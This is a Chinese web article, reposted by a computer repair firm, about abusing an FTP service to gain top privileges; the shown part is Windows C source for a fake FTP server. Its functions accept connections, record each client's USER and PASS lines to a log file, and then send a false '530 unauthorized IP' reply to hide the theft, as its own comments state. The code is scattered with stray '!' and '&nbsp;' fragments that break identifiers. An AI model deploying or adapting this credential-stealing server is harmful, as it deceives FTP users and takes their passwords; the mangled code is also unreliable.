利用ftp服务本身缺陷取得最高权限
// Return Type: BOOLEAN
// Parameters:
// In: const SOCKET ClientSocket --> The Client Connected Socket
// In: const int nSize !
; --> The SocketBuffer's Size
// &nb!
sp;
; Out: char *SocketBuffer --> Buffer To Receive Data
//--------------------------------------------------------------------------------------------
BOOL ReceiveSocketBuffer(const SOCKET ClientSocket,char *SocketBuffer,const int nSize)
{
return (recv(ClientSocket,SocketBuffer,nSize,0) > 0);
}// End Of ReceiveSocketBuffer()
//--------------------------------------------------------------------------------------------
// Purpose: To Check Whether A String Only Contains Digits
// Return Type: BOOLEAN
// Parameters:
// In: const char *String --> The String To Be Checked
//--------------------------------------------------------------------------------------------
BOOL IsDigits(const char *String)
{
UINT i = 0;
UINT StringLength = strlen!
(String);
for (i = 0;i < StringLength;i++)
{
if (String[i] < 48 ││ String[i] > 57)
{
return FALSE;
}
}
return TRUE;
}// End Of IsDigits()
//--------------------------------------------------------------------------------------------
// Purpose: To Save Information Into A File
// Return Type: BOOLEAN
// Parameters:
// In: const char *FileName --> File To Store Information
// In: const char *Info --> Information To Be Stored Into File
//--------------------------------------------------------------------------------------------
BOOL SaveInfo(const char *FileName,const char *Info)
{
HANDLE hFile = NULL;
DWORD dwBytes = 0 ;
BOOL Flag = FALSE;
// Open A File For Writing
hFile = !
CreateFile(FileName,
&n!
bsp;&nbs
p; GENERIC_READ│GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == INVALID_HANDLE_VALUE)// Fail To Open That File,Something Must Be Wrong!
{
return FALSE;
}
SetFilePointer(hFile,0,NULL,FILE_END);// Set The File Pointer To The File End
Flag = WriteFile(hFile,Info,strlen(Info),&dwBytes,NULL);// Write Information Into That File
CloseHandle(hFile);// Close File Handle
return Flag;// Return The WriteFile Status
}// End Of SaveInfo()
//--------------------------------------------------------------------------------------------
// Purpose: To Remove An Ending Enter From A String
// Return Type: BOOLEAN
// Parameters:
// In: char *String --> String To Be Modified
//--------------------------------------------------------------------------------------------
BOOL DeleteEnter(char *String)
{
UINT Length = strlen(String);
if (String[Length - 2] == '\r' ││ String[Length - 2] == '\n')
{
String[Length - 2] = '\0';
}
else
{
if (String[Leng!
th - 1] == '\r' ││ String[Length - 1] == '\n')
{
Str!
ing[Leng
th - 1] = '\0';
}
}
return TRUE;
}// End Of DeleteEnter()
//--------------------------------------------------------------------------------------------
// Purpose: To Handle FTP Request
// Return Type: BOOLEAN
// Parameters: NONE
//--------------------------------------------------------------------------------------------
BOOL HandleFTPRequest()
{
DWORD dwThreadID;
SOCKET AcceptSocket = INVALID_SOCKET;
SOCKET *CloneSocket = NULL;
while(TRUE)
{
SOCKADDR_IN client;
int nSize = sizeof(client);
AcceptSocket = accept(ListenSocket, (SOCKADDR *)&client, &nSize);
if (AcceptSocket == INVALID_SOCKET)// Something Is Wrong About The Socket
{
break;// Get To Leave
}
CloneSocket = (SOCKET *)malloc(sizeof(AcceptSocket));// Allocate For Socket Ram
if (CloneSocket == NULL)// Not Enough Ram,Very Rare Situation
{
closesocket(AcceptSocket);// !
Close That Connection
continue;
}
*CloneSocket = AcceptSocket;// Make A Copy Of Accpet Socket
HANDLE hThread = CreateThread (NULL,0, (LPTHREAD_START_ROUTINE)FTPThread,CloneSocket,0, &dwThreadID);// Create A Thread
if (hThread != NULL)
{
CloseHandle(hThread);
}
}
closesocket(ListenSocket);
return TRUE;
}// End Of HandleFPRequest()
//--------------------------------------------------------------------------------------------
// Purpose: To Steal The FTP UserName And Password
// Return Type: BOOLEAN
// Parameters:
// In: const SOCKET ClientSocket --> The Connector's Socket
//--------------------------------------------------------------------------------------------
BOOL RetrieveFTPUserAndPass(const SOCKET ClientSocket)
{
const char *UserOK = "331 User name okay, need password.\r\n";
char !
Buffer[MAX_PATH];
memset(Buffer,0,sizeof(Buffer));
!
if
(!ReceiveSocketBuffer(ClientSocket,Buffer,sizeof(Buffer)))// Fail To Receive UserName
{
return FALSE;
}
if (strnicmp(Buffer,"USER", 4) == 0)// We Get The UserName, Store It Into File
{
EnterCriticalSection(&cs);
SaveInfo(LogFile,"---------------------------------------------------------------------------\r\n");
SaveInfo(LogFile,Buffer);
LeaveCriticalSection(&cs);
}
else// Unknows Command Received
{
return FALSE;
}
if (!SendSocket(ClientSocket,UserOK))// Fail To Send Information
{
return FALSE;
}
memset(Buffer,0,MAX_PATH);
if (!ReceiveSocketBuffer(ClientSocket,Buffer,sizeof(Buffer)))// Fail To Receive Password
{
return FALSE;
}
if (strnicmp(Buffer,"PASS", 4) == 0)// We Get The Password, Store It Into File
{
EnterCriticalSection(&cs);
SaveInfo(LogFile,Buffer);
SaveInfo(LogFile,"--------------!
-------------------------------------------------------------\r\n\r\n");
LeaveCriticalSection(&cs);
}
else// Unknows Command Received
{
return FALSE;
}
return TRUE;
}// End Of RetrieveFTPUserAndPass()
//--------------------------------------------------------------------------------------------
// Purpose: To Handle The Connector's Request
// Return Type: DWORD
// Parameters:
// In: LPVOID Para --> The Connector's Socket
//--------------------------------------------------------------------------------------------
DWORD WINAPI FTPThread(LPVOID Para)
{
SOCKET ClientSocket = (*(SOCKET *)Para);// Retrieve The Socket
free(Para);// Free The Allocated Ram
if (!SendFTPBanner(ClientSocket))// Fail To Send FTP Banner
{
closesocket(ClientSocket);// Close The Connection
return 1!
;
}
RetrieveFTPUserAndPass(ClientSocket);// Get Th!
e Connec
tor's UserName and Password
SendSocket(ClientSocket,"530 Not logged in, unauthorized IP address.\r\n");// Cheat The Connector By Sending This
closesocket(ClientSocket);// Disconnect The Connector
return 0;
}// End Of FTPThread()
// End Of File
[/php]
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
